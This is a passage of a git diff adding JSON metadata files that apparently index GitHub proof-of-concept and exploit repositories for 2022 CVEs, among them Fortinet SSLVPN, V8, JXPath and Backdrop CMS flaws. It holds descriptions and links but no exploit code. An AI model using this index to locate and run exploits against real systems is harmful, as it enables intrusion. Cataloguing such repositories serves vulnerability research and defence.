remote root", + "fork": false, + "created_at": "2022-08-03T21:20:29Z", + "updated_at": "2024-07-26T05:14:47Z", + "pushed_at": "2022-10-20T17:37:43Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41717.json b/2022/CVE-2022-41717.json new file mode 100644 index 0000000000..9f1d25e08c --- /dev/null +++ b/2022/CVE-2022-41717.json @@ -0,0 +1,33 @@ +[ + { + "id": 577750614, + "name": "h2conn-exploit", + "full_name": "domdom82\/h2conn-exploit", + "owner": { + "login": "domdom82", + "id": 1755853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755853?v=4", + "html_url": "https:\/\/github.com\/domdom82", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/domdom82\/h2conn-exploit", + "description": "Exploit for CVE-2022-41717", + "fork": false, + "created_at": "2022-12-13T12:48:48Z", + "updated_at": "2022-12-13T13:13:00Z", + "pushed_at": "2022-12-22T16:01:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41741.json b/2022/CVE-2022-41741.json new file mode 100644 index 0000000000..7a6ed36c4d --- /dev/null +++ b/2022/CVE-2022-41741.json @@ -0,0 +1,33 @@ +[ + { + "id": 792443354, + "name": "evilMP4", + "full_name": "dumbbutt0\/evilMP4", + "owner": { + "login": "dumbbutt0", + "id": 134574598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134574598?v=4", + "html_url": "https:\/\/github.com\/dumbbutt0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dumbbutt0\/evilMP4", + "description": "Explore CVE-2022-41741 with the Evil MP4 repository. It offers educational PoCs,and documentation on securing nginx against MP4 file vulnerabilities. For legal, ethical security testing only.", + "fork": false, + "created_at": "2024-04-26T17:18:52Z", + "updated_at": "2024-04-26T19:00:29Z", + "pushed_at": "2024-04-26T19:00:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41828.json b/2022/CVE-2022-41828.json new file mode 100644 index 0000000000..424c61bd22 --- /dev/null +++ b/2022/CVE-2022-41828.json @@ -0,0 +1,33 @@ +[ + { + "id": 576236390, + "name": "CVE-2022-41828", + "full_name": "murataydemir\/CVE-2022-41828", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2022-41828", + "description": "[CVE-2022-41828] Amazon AWS Redshift JDBC Driver Remote Code Execution (RCE)", + "fork": false, + "created_at": "2022-12-09T10:35:33Z", + "updated_at": "2023-10-17T01:42:25Z", + "pushed_at": "2023-06-09T07:56:46Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41852.json b/2022/CVE-2022-41852.json new file mode 100644 index 0000000000..82b6e879fa --- /dev/null +++ b/2022/CVE-2022-41852.json @@ -0,0 +1,76 @@ +[ + { + "id": 551442405, + "name": "CVE-2022-41852", + "full_name": "Warxim\/CVE-2022-41852", + "owner": { + "login": "Warxim", + "id": 13665987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13665987?v=4", + "html_url": "https:\/\/github.com\/Warxim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Warxim\/CVE-2022-41852", + "description": "CVE-2022-41852 Proof of Concept (unofficial)", + "fork": false, + "created_at": "2022-10-14T12:09:19Z", + "updated_at": "2024-08-12T20:27:47Z", + "pushed_at": "2022-10-20T08:01:38Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-41852", + "hacking", + "jxpath", + "penetration-testing", + "pentesting", + "proof-of-concept", + "rce", + "remote-code-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 74, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 856170835, + "name": "CVE-2022-41852-Disable", + "full_name": "xpectomas\/CVE-2022-41852-Disable", + "owner": { + "login": "xpectomas", + "id": 103617578, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103617578?v=4", + "html_url": "https:\/\/github.com\/xpectomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpectomas\/CVE-2022-41852-Disable", + "description": null, + "fork": false, + "created_at": "2024-09-12T05:43:31Z", + "updated_at": "2024-09-12T05:51:40Z", + "pushed_at": "2024-09-12T05:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41853.json b/2022/CVE-2022-41853.json new file mode 100644 index 0000000000..0898254beb --- /dev/null +++ b/2022/CVE-2022-41853.json @@ -0,0 +1,38 @@ +[ + { + "id": 722950810, + "name": "CVE-2022-41853", + "full_name": "mbadanoiu\/CVE-2022-41853", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-41853", + "description": "Research into CVE-2022-41853: Using static functions to obtian RCE via Java Deserialization & Remote Codebase Attack", + "fork": false, + "created_at": "2023-11-24T10:30:56Z", + "updated_at": "2023-12-08T10:02:05Z", + "pushed_at": "2023-11-24T11:44:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-41853", + "deserialization", + "remote-code-execution", + "security-research" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41876.json b/2022/CVE-2022-41876.json new file mode 100644 index 0000000000..1594d27f89 --- /dev/null +++ b/2022/CVE-2022-41876.json @@ -0,0 +1,33 @@ +[ + { + "id": 617083370, + "name": "CVE-2022-41876", + "full_name": "Skileau\/CVE-2022-41876", + "owner": { + "login": "Skileau", + "id": 83423277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83423277?v=4", + "html_url": "https:\/\/github.com\/Skileau", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Skileau\/CVE-2022-41876", + "description": "PoC for CVE-2022-41876", + "fork": false, + "created_at": "2023-03-21T17:05:07Z", + "updated_at": "2023-06-06T17:38:25Z", + "pushed_at": "2023-03-24T11:20:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41903.json b/2022/CVE-2022-41903.json new file mode 100644 index 0000000000..879fb940ba --- /dev/null +++ b/2022/CVE-2022-41903.json @@ -0,0 +1,33 @@ +[ + { + "id": 593531640, + "name": "git-cveissues", + "full_name": "sondermc\/git-cveissues", + "owner": { + "login": "sondermc", + "id": 9403395, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9403395?v=4", + "html_url": "https:\/\/github.com\/sondermc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sondermc\/git-cveissues", + "description": "vulnerabilities, CVE-2022-41903, and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was also patched to address an additional, Windows-specific issue known as CVE-2022-41953.", + "fork": false, + "created_at": "2023-01-26T08:34:53Z", + "updated_at": "2023-01-26T08:47:29Z", + "pushed_at": "2023-01-31T07:52:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41923.json b/2022/CVE-2022-41923.json new file mode 100644 index 0000000000..31d0ca273e --- /dev/null +++ b/2022/CVE-2022-41923.json @@ -0,0 +1,33 @@ +[ + { + "id": 569375358, + "name": "GSSC-CVE-2022-41923", + "full_name": "grails\/GSSC-CVE-2022-41923", + "owner": { + "login": "grails", + "id": 64546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64546?v=4", + "html_url": "https:\/\/github.com\/grails", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grails\/GSSC-CVE-2022-41923", + "description": null, + "fork": false, + "created_at": "2022-11-22T17:24:51Z", + "updated_at": "2024-04-09T13:29:55Z", + "pushed_at": "2022-11-22T18:36:19Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41966.json b/2022/CVE-2022-41966.json new file mode 100644 index 0000000000..b5cf8d5c9a --- /dev/null +++ b/2022/CVE-2022-41966.json @@ -0,0 +1,33 @@ +[ + { + "id": 585766378, + "name": "Xstream_cve-2022-41966", + "full_name": "111ddea\/Xstream_cve-2022-41966", + "owner": { + "login": "111ddea", + "id": 41444127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41444127?v=4", + "html_url": "https:\/\/github.com\/111ddea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/111ddea\/Xstream_cve-2022-41966", + "description": null, + "fork": false, + "created_at": "2023-01-06T02:37:07Z", + "updated_at": "2023-01-19T05:36:46Z", + "pushed_at": "2023-01-06T02:42:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42045.json b/2022/CVE-2022-42045.json new file mode 100644 index 0000000000..06c98922db --- /dev/null +++ b/2022/CVE-2022-42045.json @@ -0,0 +1,33 @@ +[ + { + "id": 556330756, + "name": "CVE-2022-42045", + "full_name": "ReCryptLLC\/CVE-2022-42045", + "owner": { + "login": "ReCryptLLC", + "id": 18622842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18622842?v=4", + "html_url": "https:\/\/github.com\/ReCryptLLC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReCryptLLC\/CVE-2022-42045", + "description": null, + "fork": false, + "created_at": "2022-10-23T15:58:18Z", + "updated_at": "2024-10-23T14:46:06Z", + "pushed_at": "2023-06-10T14:28:43Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 37, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42046.json b/2022/CVE-2022-42046.json new file mode 100644 index 0000000000..64e1fe01a8 --- /dev/null +++ b/2022/CVE-2022-42046.json @@ -0,0 +1,36 @@ +[ + { + "id": 525878944, + "name": "CVE-2022-42046", + "full_name": "kkent030315\/CVE-2022-42046", + "owner": { + "login": "kkent030315", + "id": 37926134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37926134?v=4", + "html_url": "https:\/\/github.com\/kkent030315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkent030315\/CVE-2022-42046", + "description": "CVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation via DKOM", + "fork": false, + "created_at": "2022-08-17T16:45:13Z", + "updated_at": "2024-11-09T14:36:35Z", + "pushed_at": "2022-12-24T10:29:08Z", + "stargazers_count": 162, + "watchers_count": 162, + "has_discussions": true, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42046", + "cve-2022-48019" + ], + "visibility": "public", + "forks": 26, + "watchers": 162, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42094.json b/2022/CVE-2022-42094.json new file mode 100644 index 0000000000..7edb2bd2f2 --- /dev/null +++ b/2022/CVE-2022-42094.json @@ -0,0 +1,33 @@ +[ + { + "id": 542059955, + "name": "CVE-2022-42094", + "full_name": "bypazs\/CVE-2022-42094", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42094", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Card content.", + "fork": false, + "created_at": "2022-09-27T11:56:30Z", + "updated_at": "2022-11-01T07:19:44Z", + "pushed_at": "2022-10-31T14:35:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42095.json b/2022/CVE-2022-42095.json new file mode 100644 index 0000000000..0174607185 --- /dev/null +++ b/2022/CVE-2022-42095.json @@ -0,0 +1,33 @@ +[ + { + "id": 542070850, + "name": "CVE-2022-42095", + "full_name": "bypazs\/CVE-2022-42095", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42095", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.", + "fork": false, + "created_at": "2022-09-27T12:23:26Z", + "updated_at": "2022-11-23T16:15:06Z", + "pushed_at": "2022-09-27T12:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42096.json b/2022/CVE-2022-42096.json new file mode 100644 index 0000000000..ebf60f19e4 --- /dev/null +++ b/2022/CVE-2022-42096.json @@ -0,0 +1,33 @@ +[ + { + "id": 542072961, + "name": "CVE-2022-42096", + "full_name": "bypazs\/CVE-2022-42096", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42096", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.", + "fork": false, + "created_at": "2022-09-27T12:28:13Z", + "updated_at": "2022-11-01T07:19:50Z", + "pushed_at": "2022-10-31T14:50:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42097.json b/2022/CVE-2022-42097.json new file mode 100644 index 0000000000..7988578d00 --- /dev/null +++ b/2022/CVE-2022-42097.json @@ -0,0 +1,33 @@ +[ + { + "id": 542075338, + "name": "CVE-2022-42097", + "full_name": "bypazs\/CVE-2022-42097", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42097", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the comment.", + "fork": false, + "created_at": "2022-09-27T12:33:10Z", + "updated_at": "2022-11-01T07:19:55Z", + "pushed_at": "2022-10-31T14:56:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42098.json b/2022/CVE-2022-42098.json new file mode 100644 index 0000000000..9e77e9df77 --- /dev/null +++ b/2022/CVE-2022-42098.json @@ -0,0 +1,33 @@ +[ + { + "id": 542505822, + "name": "CVE-2022-42098", + "full_name": "bypazs\/CVE-2022-42098", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42098", + "description": "KLiK-SocialMediaWebsite v1.0.1 has SQL Injection Vulnerabilities at profile.php", + "fork": false, + "created_at": "2022-09-28T09:19:53Z", + "updated_at": "2022-11-01T07:20:03Z", + "pushed_at": "2022-10-31T15:01:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42176.json b/2022/CVE-2022-42176.json new file mode 100644 index 0000000000..204ae049ff --- /dev/null +++ b/2022/CVE-2022-42176.json @@ -0,0 +1,33 @@ +[ + { + "id": 560664396, + "name": "CVE-2022-42176", + "full_name": "soy-oreocato\/CVE-2022-42176", + "owner": { + "login": "soy-oreocato", + "id": 79870826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79870826?v=4", + "html_url": "https:\/\/github.com\/soy-oreocato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soy-oreocato\/CVE-2022-42176", + "description": null, + "fork": false, + "created_at": "2022-11-02T01:39:49Z", + "updated_at": "2022-11-04T15:03:34Z", + "pushed_at": "2024-03-28T21:40:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42475.json b/2022/CVE-2022-42475.json new file mode 100644 index 0000000000..020c0b8915 --- /dev/null +++ b/2022/CVE-2022-42475.json @@ -0,0 +1,223 @@ +[ + { + "id": 590172933, + "name": "ioc-cve-2022-42475", + "full_name": "bryanster\/ioc-cve-2022-42475", + "owner": { + "login": "bryanster", + "id": 45668775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45668775?v=4", + "html_url": "https:\/\/github.com\/bryanster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bryanster\/ioc-cve-2022-42475", + "description": "test for the ioc described for FG-IR-22-398", + "fork": false, + "created_at": "2023-01-17T20:11:04Z", + "updated_at": "2023-05-14T12:04:07Z", + "pushed_at": "2023-05-14T13:22:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42475", + "fortigate-firewall", + "fortinet" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605510069, + "name": "cve-2022-42475", + "full_name": "scrt\/cve-2022-42475", + "owner": { + "login": "scrt", + "id": 5999514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5999514?v=4", + "html_url": "https:\/\/github.com\/scrt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scrt\/cve-2022-42475", + "description": "POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon", + "fork": false, + "created_at": "2023-02-23T10:04:58Z", + "updated_at": "2024-08-12T20:29:57Z", + "pushed_at": "2023-03-14T08:41:51Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 104, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614608660, + "name": "cve-2022-42475", + "full_name": "Amir-hy\/cve-2022-42475", + "owner": { + "login": "Amir-hy", + "id": 24714998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24714998?v=4", + "html_url": "https:\/\/github.com\/Amir-hy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amir-hy\/cve-2022-42475", + "description": "FortiOS buffer overflow vulnerability", + "fork": false, + "created_at": "2023-03-16T00:05:30Z", + "updated_at": "2023-06-14T15:03:16Z", + "pushed_at": "2023-03-16T00:05:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617289614, + "name": "cve-2022-42475-Fortinet", + "full_name": "Mustafa1986\/cve-2022-42475-Fortinet", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/cve-2022-42475-Fortinet", + "description": null, + "fork": false, + "created_at": "2023-03-22T04:26:22Z", + "updated_at": "2023-03-22T04:27:35Z", + "pushed_at": "2023-03-22T04:27:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617811153, + "name": "CVE-2022-42475-RCE-POC", + "full_name": "3yujw7njai\/CVE-2022-42475-RCE-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2022-42475-RCE-POC", + "description": "CVE-2022-42475 飞塔RCE漏洞 POC", + "fork": false, + "created_at": "2023-03-23T06:48:14Z", + "updated_at": "2024-06-26T01:15:25Z", + "pushed_at": "2023-03-23T06:59:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633227706, + "name": "cve-2022-42475", + "full_name": "natceil\/cve-2022-42475", + "owner": { + "login": "natceil", + "id": 62095406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62095406?v=4", + "html_url": "https:\/\/github.com\/natceil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/natceil\/cve-2022-42475", + "description": null, + "fork": false, + "created_at": "2023-04-27T03:47:14Z", + "updated_at": "2023-04-27T03:51:54Z", + "pushed_at": "2023-04-27T04:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656889059, + "name": "CVE-2022-42475", + "full_name": "0xhaggis\/CVE-2022-42475", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2022-42475", + "description": "An exploit for CVE-2022-42475, a pre-authentication heap overflow in Fortinet networking products", + "fork": false, + "created_at": "2023-06-21T21:22:35Z", + "updated_at": "2024-07-03T03:26:32Z", + "pushed_at": "2023-06-21T21:24:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4262.json b/2022/CVE-2022-4262.json new file mode 100644 index 0000000000..47459cf69d --- /dev/null +++ b/2022/CVE-2022-4262.json @@ -0,0 +1,95 @@ +[ + { + "id": 665996378, + "name": "CVE-2022-4262", + "full_name": "bjrjk\/CVE-2022-4262", + "owner": { + "login": "bjrjk", + "id": 6657270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6657270?v=4", + "html_url": "https:\/\/github.com\/bjrjk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bjrjk\/CVE-2022-4262", + "description": "Full Chain Analysis of CVE-2022-4262, a non-trivial feedback slot type confusion in V8.", + "fork": false, + "created_at": "2023-07-13T13:17:20Z", + "updated_at": "2024-11-13T16:20:32Z", + "pushed_at": "2024-09-04T02:10:57Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 96, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 747666381, + "name": "CVE-2022-4262", + "full_name": "mistymntncop\/CVE-2022-4262", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-4262", + "description": null, + "fork": false, + "created_at": "2024-01-24T11:58:54Z", + "updated_at": "2024-09-26T14:02:29Z", + "pushed_at": "2024-01-29T22:03:03Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 756021648, + "name": "CVE-2022-4262", + "full_name": "quangnh89\/CVE-2022-4262", + "owner": { + "login": "quangnh89", + "id": 10832563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10832563?v=4", + "html_url": "https:\/\/github.com\/quangnh89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quangnh89\/CVE-2022-4262", + "description": null, + "fork": false, + "created_at": "2024-02-11T18:53:05Z", + "updated_at": "2024-02-11T18:53:05Z", + "pushed_at": "2024-02-11T18:53:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42703.json b/2022/CVE-2022-42703.json new file mode 100644 index 0000000000..fa9e08a1bd --- /dev/null +++ b/2022/CVE-2022-42703.json @@ -0,0 +1,64 @@ +[ + { + "id": 661279501, + "name": "hbp-attack-demo", + "full_name": "Squirre17\/hbp-attack-demo", + "owner": { + "login": "Squirre17", + "id": 79578430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4", + "html_url": "https:\/\/github.com\/Squirre17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Squirre17\/hbp-attack-demo", + "description": "Linux kernel hbp exploit method demo. (i.e. the degradation version of CVE-2022-42703)", + "fork": false, + "created_at": "2023-07-02T10:58:46Z", + "updated_at": "2024-09-27T02:27:31Z", + "pushed_at": "2023-07-02T12:59:37Z", + "stargazers_count": 3, + 